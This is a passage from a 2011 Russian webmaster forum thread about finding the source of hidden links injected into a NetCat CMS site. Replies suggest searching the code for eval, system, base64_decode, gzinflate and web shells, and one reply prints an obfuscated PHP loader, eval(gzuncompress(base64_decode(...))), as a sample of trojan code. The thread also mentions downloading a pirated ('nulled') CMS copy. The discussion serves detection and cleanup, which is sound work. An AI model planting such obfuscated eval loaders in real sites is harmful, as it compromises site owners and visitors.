NetCat помогите найти источник данных html-кода страницы

12
AS
На сайте с 14.09.2009
Offline
37
#11

А вы пользуйтесь той же версией нетката, которая осталась от прошлого хозяина?

Я так понимаю там вряд ли версия покупная, может более свежую опробовать? Ну или хотя бы найти нулевую в сети и обновить не из ваших бэкапов.

Скиньте плиз в личку полностью код от index.php (который в корне)

Либо стукните мне в аську, попробуем разобраться, так быстрее будет

Разработка эффективных дизайнов
TO
На сайте с 09.08.2011
Offline
3
#12
ArtShok:
А вы пользуйтесь той же версией нетката, которая осталась от прошлого хозяина?
Я так понимаю там вряд ли версия покупная, может более свежую опробовать? Ну или хотя бы найти нулевую в сети и обновить не из ваших бэкапов.

Скиньте плиз в личку полностью код от index.php (который в корне)
Либо стукните мне в аську, попробуем разобраться, так быстрее будет

CMS действительно не покупалась. Завтра в ICQ напишу.

TheOther добавил 03.11.2011 в 09:31

Написал в ICQ

TO
На сайте с 09.08.2011
Offline
3
#13

Проблема так и не разрешена. Макеты дизайна в порядке. Шаблоны, похоже, тоже. В БД ссылки не были найдены при более тщательном просмотре.

Установлен модуль обмена ссылками, но он пишет, что никаких внешних ссылок на сайт не добавлялось.

Есть еще версии у кого-нибудь?

ebitok
На сайте с 07.11.2011
Offline
112
#14

ссылки 100% шифрованны либо выкачиваются с другого сервера.

так что ищи шифрованныекоды\инклюды итд

и еще шеллы поищи :D

TO
На сайте с 09.08.2011
Offline
3
#15
ebitok:
ссылки 100% шифрованны либо выкачиваются с другого сервера.
так что ищи шифрованныекоды\инклюды итд
и еще шеллы поищи :D

ммм, а можно указать особые приметы, по которым все это добро искать?

команду искать определенную или что?

ebitok
На сайте с 07.11.2011
Offline
112
#16
eval
system
base64_decode
decode
gzinflate
urldecode

Что-то тпиа этого ищи:


<?php
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =3608;eval(gzuncompress(base64_decode('eNplj1mPgjA AhP8MSduIsSCihPDgfVvv62XDUQ5FwJZD+fWr2c1uNpuZp8nMl 4xAMMbkJWy4cUIjKBBCvgIRMAsgvfCDkMJqVSDv4tvI9WjKofA zFSUsK0j/FytYU5H+In4vDa/MIju+JYxyDi2TU1X5cKgdOxTylKUMuoyazh+EJiMRbKgblmmbF 2Ywu+2uPTLuL+P6Vj5N7bx5riWav2hk3dbw6K2Uy2HkzKPKALP 75KFK1v7ZWRtABO1Ot9cfDEfjyXQ2X5Dlar3Z7vaH4+lsWrZDX c8PLtfwFsXJnfE0y4vHs8SSXFcaarOlVWoAIaTT3Azh7yGkfwL dwV8j')));return;?>

вообще такие трои очень сложно вырезать из системы :(

а умные хацкеры вообще берут часть кода от движка + добавляют свой вредоносный код и шифруют все это дело, если удалишь этот зашифрованный кусок кода то убьешь трой и покалечишь движок :)

Если не получится, то остается только - переустановить движок и импортировать старую базу.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий